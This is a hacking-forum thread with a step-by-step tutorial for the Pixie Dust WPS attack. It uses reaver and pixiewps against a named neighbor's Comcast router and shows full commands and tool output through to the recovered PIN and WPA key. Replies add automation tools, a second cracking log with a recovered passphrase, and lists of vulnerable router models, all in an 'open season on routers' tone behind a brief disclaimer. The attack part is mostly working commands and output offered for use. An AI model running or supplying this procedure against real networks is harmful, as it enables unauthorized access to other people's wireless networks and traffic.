EvilZone
Hacking and Security => Tutorials => : iTpHo3NiX April 07, 2015, 06:04:24 AM
-
(http://i58.tinypic.com/v8200o.png)
Title: Using pixiewps on vulnerable chipset routers
Author: DeepCopy
Website: EvilZone.ORG
Disclaimer:
I do not advocate hacking of wireless networks that are not your own. This is for information purposes only. The following guide is an attack on a default Comcast setup that has WPS enabled by default with a secure WPA2 passphrase that a neighbor allowed me to attempt to break into.
Copy/Pasting:
You are welcome to copy and paste this tutorial, however I would appreciate a link to this OP leaving my name and source website intact along with my credits
Credits:
Evilzone - For existing, thanks ande and staff
FurqanHanif - For linking to the original information, getting me looking at the pixiedust exploit
Dominique Bongard - For discovering the vulnerability
reaver - The developers of reaver and also the guy that modified it for use with pixiewps
wiire - For creating pixiewps
soxrok2212 - For his youtube vid - https://www.youtube.com/watch?v=8f6oClT7Wp4
Please note this is just my walkthrough of following the steps as in the video. I prefer text tutorials to video tutorials, however if you prefer video tutorials just watch soxrok2212's video on the pixiewps attach.
Updating Reaver and Installing PixieWPS:
Kali has now included the modified reaver and pixiewps to their repos so it just got much easier to set up and install
apt-get update
apt-get install reaver
apt-get install pixiewps
Finding WPS enabled routers
So in a live attack, you're not going to know what routers are vulnerable, what routers have wps enabled, etc. That's ok
Let's set up our monitor mode interface
airmon-ng start wlan0
To find WPS enabled routers we are going to use the wash command
wash -i mon0 -CPress ctrl+c to stop the wash command
Now we get to see WPS enabled routers. Now I know that the newer comcast routers have a default setup of HOME-#### and these are running on a Ralink chipset Arrias router. These are nice and simple. So in this example I am going to be targeting a HOME-#### router.
Running reaver to collect data
Ok so now we need to collect the data to use pixiewps. So I chose my target:
ESSID: HOME-2128
BSSID: C4:39:3A:4B:21:28
Channel: 1
Lets get out info:
reaver -i mon0 -c 1 -b C4:39:3A:4B:21:28 -vv -S
We run reaver for a complete transaction and stop it pressing ctrl+c
After running this is what we get:
Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from C4:39:3A:4B:21:28
[+] Associated with C4:39:3A:4B:21:28 (ESSID: HOME-2128)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 68:94:9d:e8:c5:22:db:e0:b3:af:5d:6e:0b:3e:4e:80
[P] PKE: 83:ab:bf:00:56:2a:fc:d5:f9:ca:60:d0:e1:c4:11:e3:fe:97:0e:b3:9d:37:48:82:31:15:db:ea:0f:64:86:6a:e1:12:35:12:6f:c3:57:3d:5f:d6:5f:31:83:12:62:b4:ac:06:e7:c1:2c:3f:66:ac:54:2e:3a:54:44:66:ca:e2:65:b5:71:d9:c7:d5:67:2b:50:9e:6e:db:8b:39:31:bb:51:d7:9f:fc:39:52:57:2d:69:16:c0:40:06:0f:e0:84:e6:bb:e7:df:86:b4:7a:7c:68:f0:70:ff:37:01:1b:b5:98:be:ee:48:a8:08:26:7c:75:2f:25:2f:60:9a:87:f5:33:f1:e5:50:20:45:7d:6c:ef:fd:c1:3e:b1:00:7d:24:55:82:e6:29:78:3b:d6:03:2f:cd:e2:0a:b3:9d:0f:d4:c0:62:50:16:24:fe:ca:19:c7:3e:0a:52:64:06:bf:10:c7:0e:e3:4a:b4:17:45:3b:8d:47:de:4e:ce:8f:4f:5c
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] AuthKey: a0:22:62:16:a8:0c:36:bd:aa:40:4a:c5:96:af:1a:c8:3d:4e:89:ba:be:b5:4b:ba:fe:36:9d:99:46:0f:c4:3e
[+] Sending M2 message
[P] E-Hash1: de:20:e2:b2:74:98:00:6b:9f:8b:12:fc:9e:fb:d5:5c:81:0c:e1:00:22:60:2e:70:02:0d:8d:b5:45:be:3f:24
[P] E-Hash2: 42:30:50:cb:1f:67:f0:70:f5:0e:a0:8e:71:bb:4a:0d:d4:c6:03:f9:9f:47:1c:05:82:52:64:20:c4:03:3d:5b
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
So now if you are not receiving the ehash's you need to be closer to the access point. Simply get off your ass and move lmfao
Now im not even going to bother looking this up on wikidevi because it simply says Ralink, we're good. However if you're unsure look up the model and manufacturer on wikidevi or with google including wikidevi to get the page.
Now that we've received this message, we are ready to get the pin, yea, you heard we're already done, the rest is just plugging in the correct values
Using pixiewps to get the Pin
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : E-Hash1
-z, --e-hash2 : E-Hash2
-a, --authkey : Key used in HMAC SHA-256
Optional Arguments:
-n, --e-nonce : Enrollee nonce
-S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)
So its easy from here, just copy the data over:
pixiewps -e PKE -s EHASH1 -z EHASH2 -a AUTHKEY -S
On broadcomm chipsets, include the -n argument and the e-nonce to get the pin.
So with the following access point we punch in the values, our code looks like so:
pixiewps -e 83:ab:bf:00:56:2a:fc:d5:f9:ca:60:d0:e1:c4:11:e3:fe:97:0e:b3:9d:37:48:82:31:15:db:ea:0f:64:86:6a:e1:12:35:12:6f:c3:57:3d:5f:d6:5f:31:83:12:62:b4:ac:06:e7:c1:2c:3f:66:ac:54:2e:3a:54:44:66:ca:e2:65:b5:71:d9:c7:d5:67:2b:50:9e:6e:db:8b:39:31:bb:51:d7:9f:fc:39:52:57:2d:69:16:c0:40:06:0f:e0:84:e6:bb:e7:df:86:b4:7a:7c:68:f0:70:ff:37:01:1b:b5:98:be:ee:48:a8:08:26:7c:75:2f:25:2f:60:9a:87:f5:33:f1:e5:50:20:45:7d:6c:ef:fd:c1:3e:b1:00:7d:24:55:82:e6:29:78:3b:d6:03:2f:cd:e2:0a:b3:9d:0f:d4:c0:62:50:16:24:fe:ca:19:c7:3e:0a:52:64:06:bf:10:c7:0e:e3:4a:b4:17:45:3b:8d:47:de:4e:ce:8f:4f:5c -s de:20:e2:b2:74:98:00:6b:9f:8b:12:fc:9e:fb:d5:5c:81:0c:e1:00:22:60:2e:70:02:0d:8d:b5:45:be:3f:24 -z 42:30:50:cb:1f:67:f0:70:f5:0e:a0:8e:71:bb:4a:0d:d4:c6:03:f9:9f:47:1c:05:82:52:64:20:c4:03:3d:5b -a a0:22:62:16:a8:0c:36:bd:aa:40:4a:c5:96:af:1a:c8:3d:4e:89:ba:be:b5:4b:ba:fe:36:9d:99:46:0f:c4:3e -S
press enter and this is our output:
[*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] PSK1: 10:c4:31:46:20:a9:40:fb:c0:2b:e0:c5:13:94:9b:50
[*] PSK2: 87:6d:5d:f8:cb:08:22:3b:f8:73:80:85:c1:5d:95:ee
[+] WPS pin: 49236880
[*] Time taken: 0 s
If it says that WPS Pin not found, this is a non vulnerable router
Now we use reaver to get the key:
reaver -i mon0 -c 1 -b C4:39:3A:4B:21:28 -vv -S --pin=49236880
Congradulations. You just cracked a router in under 3 minutes.
Please post any routers and chipsets you've tried so we can work on compiling a list of working and non-working chipsets.
-
You definately deserve a cookie. Currently i have no time to try dis pixie dust attack, but it was nice to look in to this.
-
You definately deserve a cookie. Currently i have no time to try dis pixie dust attack, but it was nice to look in to this.
Yeah I was a little skeptical, but damn this is easy... shits all over the WEP attack. Literally takes no time at all. Going to have to break out the MiTM attacks, this is just too easy I almost feel sad...
-
Nicely written & very cool.
Haven't done any wifi cracking in a long while so its cool to see this.
Thanks for the share!
-
I kinda felt the same way. Seems like roughly about 50-60% of the APs around here are vulnerable to this. Add in WEP and those who have phone numbers for their passwords set by the service providers and its literally open season on routers :D
There has been a python script released which automates the process and makes it even easier:
https://github.com/nxxxu/AutoPixieWps
True story. Reminds me of airoscript.
Looking at this line:
call(["reaver", "-i", interface, "-c", channel, "-b", bssid, "-vv", "-S", WPSpin])
I think "--pin=",WPSpin needs to be added.
-
found this
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pli=1#gid=2048815923
on
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
gonna add my own findings soon(maybe)
-
found this
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pli=1#gid=2048815923
on
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
gonna add my own findings soon(maybe)
I can't update.. the netgear r6300 v1 is on the list wanted to add the v2 also is not exploitable (broadcomm chipset)
https://wikidevi.com/wiki/Netgear_R6300_v2
-
@deepcopy - I modified with "--pin=" but still shows same info.
Would like for it to append info to a database and really automate.
Script is more of a copy-paste helper tool.
BTW - my tests so far:
Confirmed working on Belkin F7D5301 v2.
Not working on Linksys E2500 v2.
-
@deepcopy - I modified with "--pin=" but still shows same info.
Would like for it to append info to a database and really automate.
Script is more of a copy-paste helper tool.
BTW - my tests so far:
Confirmed working on Belkin F7D5301 v2.
Not working on Linksys E2500 v2.
Maybe we need to develop an evilzone script to automate and have it send info to a database that can be viewed. Should be fairly simple to do in bash. I haven't written a bash script in a while, could be a fun easy project.
-
So instead for the setup do
apt-get update
apt-get install reaver
apt-get install pixiewps
updated OP, no longer need to compile reaver and pixiewps
just tested against my router
ASUS RT-AC68R is not vulnerable. I still don't use WPS anyways though :P
Not Vulnerable:
Netgear R7000 - Broadcom BCM4709A0
Linksys WRT160Nv2 - Vulnerable (Ralink RT2880 - https://wikidevi.com/wiki/Linksys_WRT160N_v2 )
-
Hello
I made a modification to reaver for him to do the pixiedust when testing a pin number
Here's my contribution
GitHub
https://github.com/t6x/reaver-wps-fork-t6x
Example
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: dd:09:bd:24:..........
[Pixie-Dust] [*] PSK2: 77:e0:dd:00:........
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...
[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'
Any problem or suggestion please contact me
-
Hello
I made a modification to reaver for him to do the pixiedust when testing a pin number
Here's my contribution
GitHub
https://github.com/t6x/reaver-wps-fork-t6x
Example
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: dd:09:bd:24:..........
[Pixie-Dust] [*] PSK2: 77:e0:dd:00:........
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...
[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'
Any problem or suggestion please contact me
Looks good, saw your modified reaver on Kali forums, thanks for the share!
-
Hey guys,
somehow I seem to be having problems with the monitor mode. After running airmon-ng start wlan0, it says monitor mode was enabled. When running wash -i mon0 -C, however, it says:
[X] ERROR: Failed to open 'mon0' for capturing
Trying to run reaver (with my router's MAC address) produces this:
[+] Switching mon0 to channel 1
[-] Failed to initialize interface 'mon0'
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.So it's obvious that something isn't right with my monitor mode, I just can't figure out what it is. I've been trying this for the past few days but always get the same error. When running ifconfig (after enabling monitor mode), I cannot find anything named "mon0". When running iwconfig, though, I get this:
mon0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Hope my post isn't too dumb, as you can see, I'm quite new to this. If any other information is required to help me, please let me know.
Kind regards
ptales
-
Review:
https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/
Most likely the name of your monitor interface is NOT mon0.
airmon-ng start wlan0
airmon-ng
(look for your monitor interface name, verify if its mon0)
-
My monitor interface's name is mon0, I checked that, of course. When running airmon-ng start wlan0, it says "(monitor mode enabled on mon0)". When running "airmon-ng", it says
Interface Chipset Driver
mon0 Unknown iwlwifi - [phy0]
wlan0 Unknown iwlwifi - [phy0]This does mean "mon0" is correct, doesn't it? Thanks for your reply! :)
-
Does your intel chipset support packet injection?
This is a basic test to determine if you card successfully supports injection.
aireplay-ng -9 wlan0
Review:
http://www.aircrack-ng.org/doku.php?id=injection_test
-
If you're using the latest version of aircrack suite 1.2 rc2+ airmon-ng puts the interface up as wlan0mon. You should probably check my updated tutorial. The link is in my signature
-
0E 800 found the problem, I guess =\
This is what aireplay-ng -9 wlan0 returns
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
-
ptales,
What WiFi chipset do you have? You may need to use different drivers, can't help much if you don't have the right drivers.
You need to start airmon-ng interface# then run aireplay on the monitor interface to see if injection is supported
-
My WLAN card is the Intel Centrino Advanced-N 6235 and all I could find regarding the chipset is that it uses a chipset from the Intel 7 series (I guess it's the Q77). The driver is iwlwifi. Running aireplay on the monitor interface returns "name not unique on network" - running it on wlan0, as suggested by 0E 800, works (see below). I hope this information is usable (and I'm not behaving completely dumb).
Again, thanks for your replies! :)
-
Get yourself one of these to play with:
http://www.amazon.com/Alfa-Awus036H-Upgraded-Long-Rang-Panel/dp/B003YHYIT0/ref=sr_1_2?s=electronics&ie=UTF8&qid=1437585931&sr=1-2&keywords=AWUS036H
-
Thought about getting one of them for quite a while now and I guess now I'll finally do it. Thanks for the link! :)
-
Worst card ever.
-
Yeah, this machine was a gift so I couldn't choose ;)
My Alfa AWUS036H should arrive tomorrow, anyway! :)
-
Worst card ever.
036h? That thing has been steady workhorse for me. I would appreciate if you would recommend a better model for wifi auditing.
-
I thought he meant my Intel Centrino? Heard only great things about the Alfa so far. If you, proxx, indeed meant the Alfa, are you sure you used an original? People say there are tons of fakes out there.
-
Its the most unstable piece of shit out there let alone the drivers which are way worse.
To blast some deauths over the airwaves is cute but shit ... a stable connection is almost impossible to achive with this card.
-
What card would you recommend as an alternative?
Thanks 0pt1musPr1m3
This one has same chipset, might be worth trying.
http://www.amazon.com/dp/B00EFLKNJI?psc=1
Staff Note: No double posting
-
Hunt for atheros, out of the box mon mode supported by atheros, what more do you need.
Most stable shit ever and just works , I have one of those PCI cards around that is awesome but also I obtained a bunch of high end pci mini or whatever it is called, atheros chipts , these things can pump out 1 watt if it is power you are honrny for, I prefer modules that are stable but these seem to do both(for those who dont get the hint, you can put it in your laptop............really??yes)
I promise I will check the labels and post details if anyone cares (ubiquity iirc)
There are alfa cards out there with such chips.
I had a bunch of those rtl 'uberhaxxorcards' , they all sorta died on me trying to download a file which is nearly impossible.
They get hot for no reason , I had 1 replaced etc, dont get me fucking started on alpha ffs.
Tried different antenna's , distance , you name it I tried it.
Even used windows to see if it would matter the slightest, I'm pretty sure its worse.
THE DRIVERS BLOW, just saying.
-
I'm going to have to agree with ProxX, Atheros is my favorite, I love the ath9k drivers, stability and performance. Always had stability issues with rtl chipset cards
-
Sorry for my late reply, was busy the last days.
My Alfa arrived and all problems I had are solved, just didn't find a vulnerable chipset router yet. Thanks for all the helpful answers I received! I've now started reading some eBooks regarding wireless penetration testing.
-
Sorry for my late reply, was busy the last days.
My Alfa arrived and all problems I had are solved, just didn't find a vulnerable chipset router yet. Thanks for all the helpful answers I received! I've now started reading some eBooks regarding wireless penetration testing.
Read through my updated tutorial:
https://evilzone.org/tutorials/wireless-auditing-with-kali-linux-aircrack-ng-reaver-and-pixiewps
That method works on more models.. This one is pretty much for Ralink and a few broadcomm chipset routers. The -S argument limits the amount of vulnerable routers. It's just much quicker bruteforcing vulnerable routers
-
Thanks for the link, will definitely read through that tutorial! You're really being a great help! :)
-
I managed to get it done, and im sharing the AP i tried it on:
[P] WPS Manufacturer: Sitecom Europe BV
[P] WPS Model Name: Wireless Access Point 300N
[P] WPS Model Number: Wireless Access Point 300N
-
I managed to get it done, and im sharing the AP i tried it on:
[P] WPS Manufacturer: Sitecom Europe BV
[P] WPS Model Name: Wireless Access Point 300N
[P] WPS Model Number: Wireless Access Point 300N
Would help if you post the first xx:xx:xx:xx of the BSSID.
Also thanks for sharing with us.
-
Would help if you post the first xx:xx:xx:xx of the BSSID.
Also thanks for sharing with us.
[P] WPS Manufacturer: Sitecom Europe BV
[P] WPS Model Name: Wireless Access Point 300N
[P] WPS Model Number: Wireless Access Point 300N
BSSID: 00:0C:F6:87
There you go ;)